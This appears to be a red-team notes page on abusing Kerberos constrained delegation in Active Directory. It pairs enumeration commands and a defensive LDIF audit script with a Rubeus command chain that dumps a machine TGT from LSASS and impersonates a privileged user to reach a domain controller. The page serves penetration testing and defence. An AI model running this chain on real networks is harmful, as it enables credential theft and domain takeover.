# Constrained Delegation

Constrained Delegation is a Kerberos feature in Active Directory that allows a service to request a Service Ticket, on behalf of a user, for an explicitly specified list of services.

The *Trust this computer for delegation to specified services only* option must be enabled in the *Delegation* tab of the object/computer's properties.

> Attribute: msDS-AllowedToDelegateTo

<figure><img src="https://3234535347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FkU93ONAZiHsNgO6Mhocr%2Fuploads%2FncWSUINUMyS0kkOi2pKn%2Fconstrained%20deleg.png?alt=media&#x26;token=d5adef22-0ffd-4809-a5fb-dfe81bc7c6d2" alt=""><figcaption><p>SQL can act on behalf of<br>[Image From <a href="https://training.zeropointsecurity.co.uk/courses/red-team-ops">CRTO</a>]</p></figcaption></figure>

When constrained delegation is enabled on a computer, it allows the computer to request a Service Ticket on behalf of another user for a specific service. This is done using the S4U2Self and S4U2Proxy Kerberos extensions.

## Enumeration

{% tabs %}
{% tab title="impacket-findDelegation" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```fish
findDelegation.py [domain]/[username]:[password]
```

{% endcode %}
{% endtab %}

{% tab title="Get-ADComputer" %}
{% embed url="https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps" %}

{% code title="Windows (Target)" %}

```powershell
Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount
```

{% endcode %}
{% endtab %}

{% tab title="ldapsearch" %}
{% embed url="https://docs.ldap.com/ldap-sdk/docs/tool-usages/ldapsearch.html" %}

{% code title="Linux (Attacker)" %}

```fish
ldapsearch -x -H ldap://[DC FQDN] \
-D 'user@domain' -w 'password' \
-b 'DC=domain,DC=local' \
'(&(objectCategory=computer)(msDS-AllowedToDelegateTo=*))' \
dNSHostName sAMAccountName msDS-AllowedToDelegateTo
```

{% endcode %}
{% endtab %}
{% endtabs %}
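As an added audit helper (not part of this page's tooling or of any of the tools linked above), the script below parses the LDIF that the ldapsearch query returns and flags computers allowed to delegate to any service on a sensitive host, such as a domain controller. The sample LDIF, domain, host names and SPNs are constructed for illustration.

```python
import base64
from collections import defaultdict

# Constructed sample of what the ldapsearch query above returns. The domain,
# host names and SPNs are made up for illustration.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=SQL,CN=Computers,DC=domain,DC=local
dNSHostName: sql.domain.local
sAMAccountName: SQL$
msDS-AllowedToDelegateTo: cifs/dc.domain.local
msDS-AllowedToDelegateTo: cifs/dc
msDS-AllowedToDelegateTo: ldap/dc.domain.local

dn: CN=WEB,CN=Computers,DC=domain,DC=local
dNSHostName: web.domain.local
sAMAccountName: WEB$
msDS-AllowedToDelegateTo: http/app.domain.local

search: 2
result: 0 Success
"""

def parse_ldif(text):
    """Map sAMAccountName -> list of msDS-AllowedToDelegateTo values."""
    result = {}
    for block in text.strip().split("\n\n"):            # blank line ends an entry
        attrs = defaultdict(list)
        for line in block.replace("\n ", "").splitlines():  # unfold wrapped values
            if line.startswith("#"):
                continue
            key, _, value = line.partition(":")
            if value.startswith(":"):                   # "attr:: <base64>" form
                value = base64.b64decode(value[1:].strip()).decode()
            attrs[key.lower()].append(value.strip())
        if "dn" in attrs:                               # skips the search/result trailer
            result[attrs["samaccountname"][0]] = attrs["msds-allowedtodelegateto"]
    return result

def spn_host(spn):
    """Host part of an SPN of the form service/host[:port][/name]."""
    return spn.split("/", 1)[-1].split("/", 1)[0].split(":", 1)[0].lower()

def risky_delegations(delegations, sensitive_hosts):
    """Accounts allowed to delegate to a service on a sensitive host (e.g. a DC)."""
    sensitive = {h.lower() for h in sensitive_hosts}
    return {acct: [s for s in spns if spn_host(s) in sensitive]
            for acct, spns in delegations.items()
            if any(spn_host(s) in sensitive for s in spns)}
```

Feed it the output of the ldapsearch command and the list of your domain controllers' host names; any account it reports matches the SQL$ to CIFS/DC$ scenario in the next section and deserves review.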

## Exploit

{% tabs %}
{% tab title="Rubeus (Use Cached TGT)" %}
{% embed url="<https://github.com/GhostPack/Rubeus>" %}

{% embed url="<https://github.com/S3cur3Th1sSh1t/SharpImpersonation>" %}

#### Scenario

SQL$ has constrained delegation rights to CIFS/DC$, and you have access to a host where the TGT of SQL$ is stored in memory.

The goal is to extract the TGT for SQL$ and use S4U2Proxy (which requires a service ticket for the impersonated user, obtained via S4U2Self) to gain access to CIFS/DC$.

{% code title="Windows" %}

```powershell
## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap Makes The Output Copy Friendly)
Rubeus.exe dump /luid:[luid of target tgt] /nowrap

## Perform S4U2Self And Then S4U2Proxy As SQL$ To Obtain A TGS For CIFS/DC$ As The Privileged User
Rubeus.exe s4u /impersonateuser:[privileged user] /msdsspn:cifs/dc.[domain] /user:sql$ /ticket:[tgt] /nowrap

## Create A Sacrificial Logon Session And Load The CIFS/DC$ TGS Into It
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[privileged user] /password:AnyPassword /ticket:[tgs for cifs/dc$]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}

{% hint style="info" %}
You must have elevated privileges on the target computer in order to dump TGTs from LSASS.
{% endhint %}
{% endtab %}
{% endtabs %}
